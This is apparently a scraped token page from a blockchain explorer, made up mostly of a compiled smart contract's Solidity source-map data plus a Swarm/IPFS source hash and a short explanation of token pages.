1502:1;1491:9;1487:17;1478:6;1440:65;:::i;:::-;1302:210;;;;:::o;1518:117::-;1627:1;1624;1617:12;1641:117;1750:1;1747;1740:12;1764:102;1805:6;1856:2;1852:7;1847:2;1840:5;1836:14;1832:28;1822:38;;1764:102;;;:::o;1872:180::-;1920:77;1917:1;1910:88;2017:4;2014:1;2007:15;2041:4;2038:1;2031:15;2058:281;2141:27;2163:4;2141:27;:::i;:::-;2133:6;2129:40;2271:6;2259:10;2256:22;2235:18;2223:10;2220:34;2217:62;2214:88;;;2282:18;;:::i;:::-;2214:88;2322:10;2318:2;2311:22;2101:238;2058:281;;:::o;2345:129::-;2379:6;2406:20;;:::i;:::-;2396:30;;2435:33;2463:4;2455:6;2435:33;:::i;:::-;2345:129;;;:::o;2480:308::-;2542:4;2632:18;2624:6;2621:30;2618:56;;;2654:18;;:::i;:::-;2618:56;2692:29;2714:6;2692:29;:::i;:::-;2684:37;;2776:4;2770;2766:15;2758:23;;2480:308;;;:::o;2794:146::-;2891:6;2886:3;2881;2868:30;2932:1;2923:6;2918:3;2914:16;2907:27;2794:146;;;:::o;2946:425::-;3024:5;3049:66;3065:49;3107:6;3065:49;:::i;:::-;3049:66;:::i;:::-;3040:75;;3138:6;3131:5;3124:21;3176:4;3169:5;3165:16;3214:3;3205:6;3200:3;3196:16;3193:25;3190:112;;;3221:79;;:::i;:::-;3190:112;3311:54;3358:6;3353:3;3348;3311:54;:::i;:::-;3030:341;2946:425;;;;;:::o;3391:340::-;3447:5;3496:3;3489:4;3481:6;3477:17;3473:27;3463:122;;3504:79;;:::i;:::-;3463:122;3621:6;3608:20;3646:79;3721:3;3713:6;3706:4;3698:6;3694:17;3646:79;:::i;:::-;3637:88;;3453:278;3391:340;;;;:::o;3737:509::-;3806:6;3855:2;3843:9;3834:7;3830:23;3826:32;3823:119;;;3861:79;;:::i;:::-;3823:119;4009:1;3998:9;3994:17;3981:31;4039:18;4031:6;4028:30;4025:117;;;4061:79;;:::i;:::-;4025:117;4166:63;4221:7;4212:6;4201:9;4197:22;4166:63;:::i;:::-;4156:73;;3952:287;3737:509;;;;:::o;4252:99::-;4304:6;4338:5;4332:12;4322:22;;4252:99;;;:::o;4357:169::-;4441:11;4475:6;4470:3;4463:19;4515:4;4510:3;4506:14;4491:29;;4357:169;;;;:::o;4532:246::-;4613:1;4623:113;4637:6;4634:1;4631:13;4623:113;;;4722:1;4717:3;4713:11;4707:18;4703:1;4698:3;4694:11;4687:39;4659:2;4656:1;4652:10;4647:15;;4623:113;;;4770:1;4761:6;4756:3;4752:16;4745:27;4594:184;4532:246;;;:::o;4784:377::-;4872:3;4900:39;4933:5;4900:39;:::i;:::-;4955:71;5019:6;5014:3;4955:71;:::i;:::-;4948:78;;5035:65;5093:6;5088:3;5081:4;5074:5;5070:16;5035:65;:::i;:::-;5125:29;5147:6;5125:29;:::i;:::-;5120:3;5116:39;5109:46;;4876:285;4784:377;;;;:::o;5167:313::-;5280:4;5318:2;5307:9;5303:18;5295:26;;5367:9;5361:4;5357:20;5353:1;5342:9;5338:17;5331:47;5395:78;5468:4;5459:6;5395:78;:::i;:::-;5387:86;;5167:313;;;;:::o;5486:77::-;5523:7;5552:5;5541:16;;5486:77;;;:::o;5569:122::-;5642:24;5660:5;5642:24;:::i;:::-;5635:5;5632:35;5622:63;;5681:1;5678;5671:12;5622:63;5569:122;:::o;5697:139::-;5743:5;5781:6;5768:20;5759:29;;5797:33;5824:5;5797:33;:::i;:::-;5697:139;;;;:::o;5842:329::-;5901:6;5950:2;5938:9;5929:7;5925:23;5921:32;5918:119;;;5956:79;;:::i;:::-;5918:119;6076:1;6101:53;6146:7;6137:6;6126:9;6122:22;6101:53;:::i;:::-;6091:63;;6047:117;5842:329;;;;:::o;6177:126::-;6214:7;6254:42;6247:5;6243:54;6232:65;;6177:126;;;:::o;6309:96::-;6346:7;6375:24;6393:5;6375:24;:::i;:::-;6364:35;;6309:96;;;:::o;6411:118::-;6498:24;6516:5;6498:24;:::i;:::-;6493:3;6486:37;6411:118;;:::o;6535:222::-;6628:4;6666:2;6655:9;6651:18;6643:26;;6679:71;6747:1;6736:9;6732:17;6723:6;6679:71;:::i;:::-;6535:222;;;;:::o;6763:122::-;6836:24;6854:5;6836:24;:::i;:::-;6829:5;6826:35;6816:63;;6875:1;6872;6865:12;6816:63;6763:122;:::o;6891:139::-;6937:5;6975:6;6962:20;6953:29;;6991:33;7018:5;6991:33;:::i;:::-;6891:139;;;;:::o;7036:474::-;7104:6;7112;7161:2;7149:9;7140:7;7136:23;7132:32;7129:119;;;7167:79;;:::i;:::-;7129:119;7287:1;7312:53;7357:7;7348:6;7337:9;7333:22;7312:53;:::i;:::-;7302:63;;7258:117;7414:2;7440:53;7485:7;7476:6;7465:9;7461:22;7440:53;:::i;:::-;7430:63;;7385:118;7036:474;;;;;:::o;7516:118::-;7603:24;7621:5;7603:24;:::i;:::-;7598:3;7591:37;7516:118;;:::o;7640:222::-;7733:4;7771:2;7760:9;7756:18;7748:26;;7784:71;7852:1;7841:9;7837:17;7828:6;7784:71;:::i;:::-;7640:222;;;;:::o;7868:619::-;7945:6;7953;7961;8010:2;7998:9;7989:7;7985:23;7981:32;7978:119;;;8016:79;;:::i;:::-;7978:119;8136:1;8161:53;8206:7;8197:6;8186:9;8182:22;8161:53;:::i;:::-;8151:63;;8107:117;8263:2;8289:53;8334:7;8325:6;8314:9;8310:22;8289:53;:::i;:::-;8279:63;;8234:118;8391:2;8417:53;8462:7;8453:6;8442:9;8438:22;8417:53;:::i;:::-;8407:63;;8362:118;7868:619;;;;;:::o;8493:474::-;8561:6;8569;8618:2;8606:9;8597:7;8593:23;8589:32;8586:119;;;8624:79;;:::i;:::-;8586:119;8744:1;8769:53;8814:7;8805:6;8794:9;8790:22;8769:53;:::i;:::-;8759:63;;8715:117;8871:2;8897:53;8942:7;8933:6;8922:9;8918:22;8897:53;:::i;:::-;8887:63;;8842:118;8493:474;;;;;:::o;8973:332::-;9094:4;9132:2;9121:9;9117:18;9109:26;;9145:71;9213:1;9202:9;9198:17;9189:6;9145:71;:::i;:::-;9226:72;9294:2;9283:9;9279:18;9270:6;9226:72;:::i;:::-;8973:332;;;;;:::o;9311:474::-;9379:6;9387;9436:2;9424:9;9415:7;9411:23;9407:32;9404:119;;;9442:79;;:::i;:::-;9404:119;9562:1;9587:53;9632:7;9623:6;9612:9;9608:22;9587:53;:::i;:::-;9577:63;;9533:117;9689:2;9715:53;9760:7;9751:6;9740:9;9736:22;9715:53;:::i;:::-;9705:63;;9660:118;9311:474;;;;;:::o;9791:60::-;9819:3;9840:5;9833:12;;9791:60;;;:::o;9857:142::-;9907:9;9940:53;9958:34;9967:24;9985:5;9967:24;:::i;:::-;9958:34;:::i;:::-;9940:53;:::i;:::-;9927:66;;9857:142;;;:::o;10005:126::-;10055:9;10088:37;10119:5;10088:37;:::i;:::-;10075:50;;10005:126;;;:::o;10137:158::-;10219:9;10252:37;10283:5;10252:37;:::i;:::-;10239:50;;10137:158;;;:::o;10301:195::-;10420:69;10483:5;10420:69;:::i;:::-;10415:3;10408:82;10301:195;;:::o;10502:286::-;10627:4;10665:2;10654:9;10650:18;10642:26;;10678:103;10778:1;10767:9;10763:17;10754:6;10678:103;:::i;:::-;10502:286;;;;:::o;10794:329::-;10853:6;10902:2;10890:9;10881:7;10877:23;10873:32;10870:119;;;10908:79;;:::i;:::-;10870:119;11028:1;11053:53;11098:7;11089:6;11078:9;11074:22;11053:53;:::i;:::-;11043:63;;10999:117;10794:329;;;;:::o;11129:116::-;11199:21;11214:5;11199:21;:::i;:::-;11192:5;11189:32;11179:60;;11235:1;11232;11225:12;11179:60;11129:116;:::o;11251:133::-;11294:5;11332:6;11319:20;11310:29;;11348:30;11372:5;11348:30;:::i;:::-;11251:133;;;;:::o;11390:468::-;11455:6;11463;11512:2;11500:9;11491:7;11487:23;11483:32;11480:119;;;11518:79;;:::i;:::-;11480:119;11638:1;11663:53;11708:7;11699:6;11688:9;11684:22;11663:53;:::i;:::-;11653:63;;11609:117;11765:2;11791:50;11833:7;11824:6;11813:9;11809:22;11791:50;:::i;:::-;11781:60;;11736:115;11390:468;;;;;:::o;11864:307::-;11925:4;12015:18;12007:6;12004:30;12001:56;;;12037:18;;:::i;:::-;12001:56;12075:29;12097:6;12075:29;:::i;:::-;12067:37;;12159:4;12153;12149:15;12141:23;;11864:307;;;:::o;12177:423::-;12254:5;12279:65;12295:48;12336:6;12295:48;:::i;:::-;12279:65;:::i;:::-;12270:74;;12367:6;12360:5;12353:21;12405:4;12398:5;12394:16;12443:3;12434:6;12429:3;12425:16;12422:25;12419:112;;;12450:79;;:::i;:::-;12419:112;12540:54;12587:6;12582:3;12577;12540:54;:::i;:::-;12260:340;12177:423;;;;;:::o;12619:338::-;12674:5;12723:3;12716:4;12708:6;12704:17;12700:27;12690:122;;12731:79;;:::i;:::-;12690:122;12848:6;12835:20;12873:78;12947:3;12939:6;12932:4;12924:6;12920:17;12873:78;:::i;:::-;12864:87;;12680:277;12619:338;;;;:::o;12963:943::-;13058:6;13066;13074;13082;13131:3;13119:9;13110:7;13106:23;13102:33;13099:120;;;13138:79;;:::i;:::-;13099:120;13258:1;13283:53;13328:7;13319:6;13308:9;13304:22;13283:53;:::i;:::-;13273:63;;13229:117;13385:2;13411:53;13456:7;13447:6;13436:9;13432:22;13411:53;:::i;:::-;13401:63;;13356:118;13513:2;13539:53;13584:7;13575:6;13564:9;13560:22;13539:53;:::i;:::-;13529:63;;13484:118;13669:2;13658:9;13654:18;13641:32;13700:18;13692:6;13689:30;13686:117;;;13722:79;;:::i;:::-;13686:117;13827:62;13881:7;13872:6;13861:9;13857:22;13827:62;:::i;:::-;13817:72;;13612:287;12963:943;;;;;;;:::o;13912:180::-;13960:77;13957:1;13950:88;14057:4;14054:1;14047:15;14081:4;14078:1;14071:15;14098:320;14142:6;14179:1;14173:4;14169:12;14159:22;;14226:1;14220:4;14216:12;14247:18;14237:81;;14303:4;14295:6;14291:17;14281:27;;14237:81;14365:2;14357:6;14354:14;14334:18;14331:38;14328:84;;14384:18;;:::i;:::-;14328:84;14149:269;14098:320;;;:::o;14424:141::-;14473:4;14496:3;14488:11;;14519:3;14516:1;14509:14;14553:4;14550:1;14540:18;14532:26;;14424:141;;;:::o;14571:93::-;14608:6;14655:2;14650;14643:5;14639:14;14635:23;14625:33;;14571:93;;;:::o;14670:107::-;14714:8;14764:5;14758:4;14754:16;14733:37;;14670:107;;;;:::o;14783:393::-;14852:6;14902:1;14890:10;14886:18;14925:97;14955:66;14944:9;14925:97;:::i;:::-;15043:39;15073:8;15062:9;15043:39;:::i;:::-;15031:51;;15115:4;15111:9;15104:5;15100:21;15091:30;;15164:4;15154:8;15150:19;15143:5;15140:30;15130:40;;14859:317;;14783:393;;;;;:::o;15182:142::-;15232:9;15265:53;15283:34;15292:24;15310:5;15292:24;:::i;:::-;15283:34;:::i;:::-;15265:53;:::i;:::-;15252:66;;15182:142;;;:::o;15330:75::-;15373:3;15394:5;15387:12;;15330:75;;;:::o;15411:269::-;15521:39;15552:7;15521:39;:::i;:::-;15582:91;15631:41;15655:16;15631:41;:::i;:::-;15623:6;15616:4;15610:11;15582:91;:::i;:::-;15576:4;15569:105;15487:193;15411:269;;;:::o;15686:73::-;15731:3;15686:73;:::o;15765:189::-;15842:32;;:::i;:::-;15883:65;15941:6;15933;15927:4;15883:65;:::i;:::-;15818:136;15765:189;;:::o;15960:186::-;16020:120;16037:3;16030:5;16027:14;16020:120;;;16091:39;16128:1;16121:5;16091:39;:::i;:::-;16064:1;16057:5;16053:13;16044:22;;16020:120;;;15960:186;;:::o;16152:543::-;16253:2;16248:3;16245:11;16242:446;;;16287:38;16319:5;16287:38;:::i;:::-;16371:29;16389:10;16371:29;:::i;:::-;16361:8;16357:44;16554:2;16542:10;16539:18;16536:49;;;16575:8;16560:23;;16536:49;16598:80;16654:22;16672:3;16654:22;:::i;:::-;16644:8;16640:37;16627:11;16598:80;:::i;:::-;16257:431;;16242:446;16152:543;;;:::o;16701:117::-;16755:8;16805:5;16799:4;16795:16;16774:37;;16701:117;;;;:::o;16824:169::-;16868:6;16901:51;16949:1;16945:6;16937:5;16934:1;16930:13;16901:51;:::i;:::-;16897:56;16982:4;16976;16972:15;16962:25;;16875:118;16824:169;;;;:::o;16998:295::-;17074:4;17220:29;17245:3;17239:4;17220:29;:::i;:::-;17212:37;;17282:3;17279:1;17275:11;17269:4;17266:21;17258:29;;16998:295;;;;:::o;17298:1395::-;17415:37;17448:3;17415:37;:::i;:::-;17517:18;17509:6;17506:30;17503:56;;;17539:18;;:::i;:::-;17503:56;17583:38;17615:4;17609:11;17583:38;:::i;:::-;17668:67;17728:6;17720;17714:4;17668:67;:::i;:::-;17762:1;17786:4;17773:17;;17818:2;17810:6;17807:14;17835:1;17830:618;;;;18492:1;18509:6;18506:77;;;18558:9;18553:3;18549:19;18543:26;18534:35;;18506:77;18609:67;18669:6;18662:5;18609:67;:::i;:::-;18603:4;18596:81;18465:222;17800:887;;17830:618;17882:4;17878:9;17870:6;17866:22;17916:37;17948:4;17916:37;:::i;:::-;17975:1;17989:208;18003:7;18000:1;17997:14;17989:208;;;18082:9;18077:3;18073:19;18067:26;18059:6;18052:42;18133:1;18125:6;18121:14;18111:24;;18180:2;18169:9;18165:18;18152:31;;18026:4;18023:1;18019:12;18014:17;;17989:208;;;18225:6;18216:7;18213:19;18210:179;;;18283:9;18278:3;18274:19;18268:26;18326:48;18368:4;18360:6;18356:17;18345:9;18326:48;:::i;:::-;18318:6;18311:64;18233:156;18210:179;18435:1;18431;18423:6;18419:14;18415:22;18409:4;18402:36;17837:611;;;17800:887;;17390:1303;;;17298:1395;;:::o;18699:332::-;18820:4;18858:2;18847:9;18843:18;18835:26;;18871:71;18939:1;18928:9;18924:17;18915:6;18871:71;:::i;:::-;18952:72;19020:2;19009:9;19005:18;18996:6;18952:72;:::i;:::-;18699:332;;;;;:::o;19037:137::-;19091:5;19122:6;19116:13;19107:22;;19138:30;19162:5;19138:30;:::i;:::-;19037:137;;;;:::o;19180:345::-;19247:6;19296:2;19284:9;19275:7;19271:23;19267:32;19264:119;;;19302:79;;:::i;:::-;19264:119;19422:1;19447:61;19500:7;19491:6;19480:9;19476:22;19447:61;:::i;:::-;19437:71;;19393:125;19180:345;;;;:::o;19531:180::-;19579:77;19576:1;19569:88;19676:4;19673:1;19666:15;19700:4;19697:1;19690:15;19717:410;19757:7;19780:20;19798:1;19780:20;:::i;:::-;19775:25;;19814:20;19832:1;19814:20;:::i;:::-;19809:25;;19869:1;19866;19862:9;19891:30;19909:11;19891:30;:::i;:::-;19880:41;;20070:1;20061:7;20057:15;20054:1;20051:22;20031:1;20024:9;20004:83;19981:139;;20100:18;;:::i;:::-;19981:139;19765:362;19717:410;;;;:::o;20133:180::-;20181:77;20178:1;20171:88;20278:4;20275:1;20268:15;20302:4;20299:1;20292:15;20319:185;20359:1;20376:20;20394:1;20376:20;:::i;:::-;20371:25;;20410:20;20428:1;20410:20;:::i;:::-;20405:25;;20449:1;20439:35;;20454:18;;:::i;:::-;20439:35;20496:1;20493;20489:9;20484:14;;20319:185;;;;:::o;20510:191::-;20550:3;20569:20;20587:1;20569:20;:::i;:::-;20564:25;;20603:20;20621:1;20603:20;:::i;:::-;20598:25;;20646:1;20643;20639:9;20632:16;;20667:3;20664:1;20661:10;20658:36;;;20674:18;;:::i;:::-;20658:36;20510:191;;;;:::o;20707:148::-;20809:11;20846:3;20831:18;;20707:148;;;;:::o;20885:874::-;20988:3;21025:5;21019:12;21054:36;21080:9;21054:36;:::i;:::-;21106:89;21188:6;21183:3;21106:89;:::i;:::-;21099:96;;21226:1;21215:9;21211:17;21242:1;21237:166;;;;21417:1;21412:341;;;;21204:549;;21237:166;21321:4;21317:9;21306;21302:25;21297:3;21290:38;21383:6;21376:14;21369:22;21361:6;21357:35;21352:3;21348:45;21341:52;;21237:166;;21412:341;21479:38;21511:5;21479:38;:::i;:::-;21539:1;21553:154;21567:6;21564:1;21561:13;21553:154;;;21641:7;21635:14;21631:1;21626:3;21622:11;21615:35;21691:1;21682:7;21678:15;21667:26;;21589:4;21586:1;21582:12;21577:17;;21553:154;;;21736:6;21731:3;21727:16;21720:23;;21419:334;;21204:549;;20992:767;;20885:874;;;;:::o;21765:390::-;21871:3;21899:39;21932:5;21899:39;:::i;:::-;21954:89;22036:6;22031:3;21954:89;:::i;:::-;21947:96;;22052:65;22110:6;22105:3;22098:4;22091:5;22087:16;22052:65;:::i;:::-;22142:6;22137:3;22133:16;22126:23;;21875:280;21765:390;;;;:::o;22161:155::-;22301:7;22297:1;22289:6;22285:14;22278:31;22161:155;:::o;22322:400::-;22482:3;22503:84;22585:1;22580:3;22503:84;:::i;:::-;22496:91;;22596:93;22685:3;22596:93;:::i;:::-;22714:1;22709:3;22705:11;22698:18;;22322:400;;;:::o;22728:695::-;23006:3;23028:92;23116:3;23107:6;23028:92;:::i;:::-;23021:99;;23137:95;23228:3;23219:6;23137:95;:::i;:::-;23130:102;;23249:148;23393:3;23249:148;:::i;:::-;23242:155;;23414:3;23407:10;;22728:695;;;;;:::o;23429:233::-;23468:3;23491:24;23509:5;23491:24;:::i;:::-;23482:33;;23537:66;23530:5;23527:77;23524:103;;23607:18;;:::i;:::-;23524:103;23654:1;23647:5;23643:13;23636:20;;23429:233;;;:::o;23668:194::-;23708:4;23728:20;23746:1;23728:20;:::i;:::-;23723:25;;23762:20;23780:1;23762:20;:::i;:::-;23757:25;;23806:1;23803;23799:9;23791:17;;23830:1;23824:4;23821:11;23818:37;;;23835:18;;:::i;:::-;23818:37;23668:194;;;;:::o;23868:98::-;23919:6;23953:5;23947:12;23937:22;;23868:98;;;:::o;23972:168::-;24055:11;24089:6;24084:3;24077:19;24129:4;24124:3;24120:14;24105:29;;23972:168;;;;:::o;24146:373::-;24232:3;24260:38;24292:5;24260:38;:::i;:::-;24314:70;24377:6;24372:3;24314:70;:::i;:::-;24307:77;;24393:65;24451:6;24446:3;24439:4;24432:5;24428:16;24393:65;:::i;:::-;24483:29;24505:6;24483:29;:::i;:::-;24478:3;24474:39;24467:46;;24236:283;24146:373;;;;:::o;24525:640::-;24720:4;24758:3;24747:9;24743:19;24735:27;;24772:71;24840:1;24829:9;24825:17;24816:6;24772:71;:::i;:::-;24853:72;24921:2;24910:9;24906:18;24897:6;24853:72;:::i;:::-;24935;25003:2;24992:9;24988:18;24979:6;24935:72;:::i;:::-;25054:9;25048:4;25044:20;25039:2;25028:9;25024:18;25017:48;25082:76;25153:4;25144:6;25082:76;:::i;:::-;25074:84;;24525:640;;;;;;;:::o;25171:141::-;25227:5;25258:6;25252:13;25243:22;;25274:32;25300:5;25274:32;:::i;:::-;25171:141;;;;:::o;25318:349::-;25387:6;25436:2;25424:9;25415:7;25411:23;25407:32;25404:119;;;25442:79;;:::i;:::-;25404:119;25562:1;25587:63;25642:7;25633:6;25622:9;25618:22;25587:63;:::i;:::-;25577:73;;25533:127;25318:349;;;;:::o

Swarm Source

ipfs://0ca7d66361d90c45c9143df3ecd72a2ba2f4783e05a832b91d633f69fae9eb72
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.